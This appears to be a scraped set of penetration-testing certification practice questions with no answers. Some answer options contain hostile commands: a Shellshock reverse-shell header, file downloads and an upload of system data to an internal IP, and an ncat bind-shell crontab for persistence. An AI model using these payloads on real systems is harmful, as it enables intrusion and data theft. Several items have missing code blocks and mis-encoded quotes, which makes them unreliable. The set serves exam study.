A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester MOST likely utilize?

A. Wireshark

B. Netcat

C. Nmap

D. Ettercap

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

A. Wireshark

B. EAPHammer

C. Kismet

D. Aircrack-ng

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A. Network segmentation

B. Key rotation

C. Encrypted passwords

D. Patch management

A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?

A. Wireshark

B. Aircrack-ng

C. Kismet

D. Wifite

A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the following is the most likely explanation for keeping the diary?

A. To facilitate post-engagement cleanup

B. To monitor lessons learned

C. To foster client acceptance

D. To follow the data destruction process

A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

A. Set up a captive portal with embedded malicious code.

B. Capture handshakes from wireless clients to crack.

C. Span deauthentication packets to the wireless clients.

D. Set up another access point and perform an evil twin attack.

PCI DSS requires which of the following as part of the penetration-testing process?

A. The penetration tester must have cybersecurity certifications.

B. The network must be segmented.

C. Only externally facing systems should be tested.

D. The assessment must be performed during non-working hours.

Which of the following factors would a penetration tester MOST likely consider when testing at a location?

A. Determine if visas are required.

B. Ensure all testers can access all sites.

C. Verify the tools being used are legal for use at all sites.

D. Establish the time of the day when a test can occur.

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

A. The penetration tester conducts a retest.

B. The penetration tester deletes all scripts from the client machines.

C. The client applies patches to the systems.

D. The client clears system logs generated during the test.

A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?

A. Launch an external scan of netblocks.

B. Check WHOIS and netblock records for the company.

C. Use DNS lookups and dig to determine the external hosts.

D. Conduct a ping sweep of the company’s netblocks.

A penetration tester developed the following script to be used during an engagement:
 
However, when the penetration tester ran the script, the tester received the following message:
socket.gaierror: [Errno -2] Name or service not known
Which of the following changes should the penetration tester implement to fix the script?

A.

B.

C.

D.

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?

A. windows/x64/meterpreter/reverse_tcp

B. windows/x64/meterpreter/reverse_http

C. windows/x64/shell_reverse_tcp

D. windows/x64/powershell_reverse_tcp

E. windows/x64/meterpreter/reverse_https

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

A. Spawned shells

B. Created user accounts

C. Server logs

D. Administrator accounts

E. Reboot system

F. ARP cache

Which of the following is a ROE component that provides a penetration tester with guidance on who and how to contact the necessary individuals in the event of a disaster during an engagement?

A. Engagement scope

B. Communication escalation path

C. SLA

D. SOW

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

A. Mask

B. Rainbow

C. Dictionary

D. Password spraying

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

A. nmap –sU –p 1–1024 10.0.0.15

B. nmap –p 22, 25, 80, 3389 –T2 10.0.0.15 –Pn

C. nmap –T5 –p 1–65535 –A 10.0.0.15

D. nmap –T3 –F 10.0.0.15

A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

A. Maximizing the likelihood of finding vulnerabilities

B. Reprioritizing the goals/objectives

C. Eliminating the potential for false positives

D. Reducing the risk to the client environment

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

A. Utilize the tunnel as a means of pivoting to other internal devices.

B. Disregard the IP range, as it is out of scope.

C. Stop the assessment and inform the emergency contact.

D. Scan the IP range for additional systems to exploit.

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.
Which of the following tools or techniques would BEST support additional reconnaissance?

A. Wardriving

B. Shodan

C. Recon-ng

D. Aircrack-ng

A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

A. Configure wireless access to use a AAA server.

B. Use random MAC addresses on the penetration testing distribution.

C. Install a host-based firewall on the penetration testing distribution.

D. Connect to the penetration testing company’s VPS using a VPN.

A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems.
Which of the following Nmap commands should the analyst use to achieve this objective?

A. nmap -F 192.168.5.5

B. nmap -datalength 2 192.168.5.5

C. nmap -D 0.5.2.2 192.168.5.5

D. nmap -scanflags SYNFIN 192.168.5.5

A penetration tester executes the following Nmap command and obtains the following output:
 
Which of the following commands would BEST help the penetration tester discover an exploitable service?

A. nmap -v -p 25 –script smtp-enum-users remotehost

B. nmap -v –script=mysql-info.nse remotehost

C. nmap –script=smb-brute.nse remotehost

D. nmap -p 3306 –script “http*vuln*” remotehost

After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:
 
The tester then runs the following command from the previous exploited system, which fails:
 
Which of the following explains the reason why the command failed?

A. The tester input the incorrect IP address.

B. The command requires the ג€”port 135 option.

C. An account for RDP does not exist on the server.

D. PowerShell requires administrative privilege.

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.
Which of the following tools can help the tester achieve this goal?

A. Metasploit

B. Hydra

C. SET

D. WPScan

While performing the scanning phase of a penetration test, the penetration tester runs the following command:
nmap -n -vv -sV -p- 10.10.10.23-28
After the Nmap scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try NEXT?

A. -sU

B. -Pn

C. -sn

D. -sS

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

A. The tester had the situational awareness to stop the transfer.

B. The tester found evidence of prior compromise within the data set.

C. The tester completed the assigned part of the assessment workflow.

D. The tester reached the end of the assessment time frame.

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

A. Smurf

B. Ping flood

C. Fraggle

D. Ping of death

A company recruited a penetration tester to brute force an SSH password on a server. The tester would like to use THC Hydra to perform the attack and remember the use of the -t option. Which of the following should be considered when using this option?

A. The number of connects in parallel per target

B. The number of task connects in parallel overall

C. The waiting time for a response between connects per threads

D. If the output shows log-ins and passwords for each attempt

Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)

A. OWASP ZAP

B. Nmap

C. Nessus

D. BeEF

E. Hydra

F. Burp Suite

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

A. OpenVAS

B. Nikto

C. SQLmap

D. Nessus

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}

B. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}

C. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}

D. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80ג€ 0>&1ג€ ג€Acceptג€: ג€text/ html,application/xhtml+xml,application/xmlג€}

After running the enum4linux.pl command, a penetration tester received the following output:
 
Which of the following commands should the penetration tester run NEXT?

A. smbspool //192.160.100.56/print$

B. net rpc share -S 192.168.100.56 -U ”

C. smbget //192.168.100.56/web -U ”

D. smbclient //192.168.100.56/web -U ” -N

Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:

A. devices produce more heat and consume more power.

B. devices are obsolete and are no longer available for replacement.

C. protocols are more difficult to understand.

D. devices may cause physical world effects.

A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user workstations. Which of the following should be included in the recommendations for remediation?

A. Start a training program on proper access to the web server.

B. Build a patch-management program for the web server.

C. Place the web server in a screened subnet

D. Implement endpoint protection on the workstations.

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
✑ The following request was intercepted going to the network device:
GET /login HTTP/1.1 -
Host: 10.50.100.16 -
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0)
Gecko/20100101 Firefox/31.0 -
Accept-Language: en-US,en;q=0.5 -
Connection: keep-alive -
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
✑ Network management interfaces are available on the production network.
✑ An Nmap scan retuned the following:
Port      State         Service     Version
22/tcp      open        ssh        Cisco SSH 1.25 (protocol 2.0
80/tcp      open        http       Cisco IOS http config
|_https-title: Did not follow redirect to https://10.50.100.16
443/tcp     open        https      Cisco IOS https config
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

A. Enforce enhanced password complexity requirements.

B. Disable or upgrade SSH daemon.

C. Disable HTTP/301 redirect configuration.

D. Create an out-of-band network for management.

E. Implement a better method for authentication.

F. Eliminate network management and control interfaces.

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester start this process?

A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe

B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)

C. schtasks /query /fo LIST /v | find /I “Next Run Time:”

D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.
Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

A. PLCs will not act upon commands injected over the network.

B. Supervisors and controllers are on a separate virtual network by default.

C. Controllers will not validate the origin of commands.

D. Supervisory systems will detect a malicious injection of code/commands.

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:
 
Which of the following was the script author trying to do?

A. Spawn a local shell.

B. Disable NIC.

C. List processes.

D. Change the MAC address.

A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)

A. Setting up a secret management solution for all items in the source code management system

B. Implementing role-based access control on the source code management system

C. Configuring multifactor authentication on the source code management system

D. Leveraging a solution to scan for other similar instances in the source code management system

E. Developing a secure software development life cycle process for committing code to the source code management system

F. Creating a trigger that will prevent developers from including passwords in the source code management system

A consulting company is completing the ROE during scoping.
Which of the following should be included in the ROE?

A. Cost of the assessment

B. Report distribution

C. Testing restrictions

D. Liability

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

A. Key reinstallation

B. Deauthentication

C. Evil twin

D. Replay

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?

A. Command injection

B. Broken authentication

C. Direct object reference

D. Cross-site scripting

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

A. Statement of work

B. Program scope

C. Non-disclosure agreement

D. Rules of engagement

During an assessment, a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web servers. Which of the following actions should the penetration tester perform next?

A. Continue the assessment and mark the finding as critical.

B. Attempt to remediate the issue temporarily.

C. Notify the primary contact immediately.

D. Shut down the web server until the assessment is finished.

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

A. Nmap

B. tcpdump

C. Scapy

D. hping3

The results of an Nmap scan are as follows:
 
Which of the following device types will MOST likely have a similar response?

A. Active Directory domain controller

B. IoT/embedded device

C. Exposed RDP

D. Print queue

A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?

A. OWASP Top 10

B. MITRE ATT&CK framework

C. NIST Cybersecurity Framework

D. The Diamond Model of Intrusion Analysis

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.
Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

A. Sniff and then crack the WPS PIN on an associated WiFi device.

B. Dump the user address book on the device.

C. Break a connection between two Bluetooth devices.

D. Transmit text messages to the device.

During passive reconnaissance of a target organization’s infrastructure, a penetration tester wants to identify key contacts and job responsibilities within the company. Which of the following techniques would be the most effective for this situation?

A. Social media scraping

B. Website archive and caching

C. DNS lookup

D. File metadata analysis

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.
Which of the following can be used to ensure the tester is able to maintain access to the system?

A. schtasks /create /sc /ONSTART /tr C:Temp|WindowsUpdate.exe

B. wmic startup get caption,command

C. crontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€) | crontab 2>/dev/null

D. sudo useradd -ou 0 -g 0 user